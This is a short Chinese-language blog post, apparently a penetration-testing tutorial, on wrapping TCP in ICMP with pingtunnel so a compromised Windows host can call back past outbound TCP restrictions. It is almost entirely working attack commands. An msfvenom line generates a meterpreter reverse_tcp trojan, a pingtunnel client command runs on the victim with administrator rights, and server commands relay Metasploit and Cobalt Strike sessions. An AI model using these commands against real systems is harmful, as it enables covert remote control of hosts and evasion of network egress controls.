隧道技术-tcp封装icmp出网

1.背景:

目标出网限制tcp协议

2.msf木马转发上线

生成木马:msfvenom -p windows/meterpreter/reverse_tcp Lhost=127.0.0.1 LPORT=3333 -f exe > msf1.exe

受害机器管理员权限执行:

pingtunnel.exe -type client -l 127.0.0.1:3333 -s 192.168.3.195 -t 192.168.3.195:4444 -tcp 1 -noprint 1 -nolog 1

攻击机器执行:

./pingtunnel -type server

使用msf接受tcp协议木马会话

原理:

木马运行在受害主机使用本地3333端口连接,由tcp协议转换未icmp协议数据出网,由kali接收,并且再次转会tcp协议。

3.cs木马转发上线

cs创建监听器:

使用本地的127.0.0.1:9999tcp协议数据使用icmp封装传递给cs服务端。

cs服务端执行:./ping -type server

受害机器执行:

pingtunnel.exe -type client -l 127.0.0.1:9999-s csip -t csip:7777 -tcp 1 -noprint 1 -nolog 1、

相关推荐
2503_924806854 小时前
动态IP使用中 报错407 怎么办???
服务器·tcp/ip·php
小白银子5 小时前
零基础从头教学Linux(Day 42)
linux·运维·服务器·网络·nginx
火星MARK5 小时前
如何配置 Ingress 的 SSL/TLS 证书?
网络·网络协议·ssl
看好多桂花树5 小时前
Nginx SSL/TLS 配置
网络·nginx·ssl
程序猿费益洲6 小时前
Docker 网络详解:(一)Linux 网络虚拟化技术
linux·网络·docker·容器·云计算
shylyly_7 小时前
Linux-> UDP 编程3
linux·运维·网络协议·udp·bind·cs·聊天室程序
云宏信息7 小时前
赛迪顾问《2025中国虚拟化市场研究报告》解读丨虚拟化市场迈向“多元算力架构”,国产化与AI驱动成关键变量
网络·人工智能·ai·容器·性能优化·架构·云计算
歪歪1008 小时前
什么是TCP/UDP/HTTP?
开发语言·网络·网络协议·tcp/ip·http·udp
luckys.one8 小时前
第12篇|[特殊字符] Freqtrade 交易所接入全解:API、WebSocket、限频配置详解
网络·ide·python·websocket·网络协议·flask·流量运营
踏过山河,踏过海8 小时前
在SSL证书是有效的前提下,依旧显示“资源不安全
网络协议·安全·ssl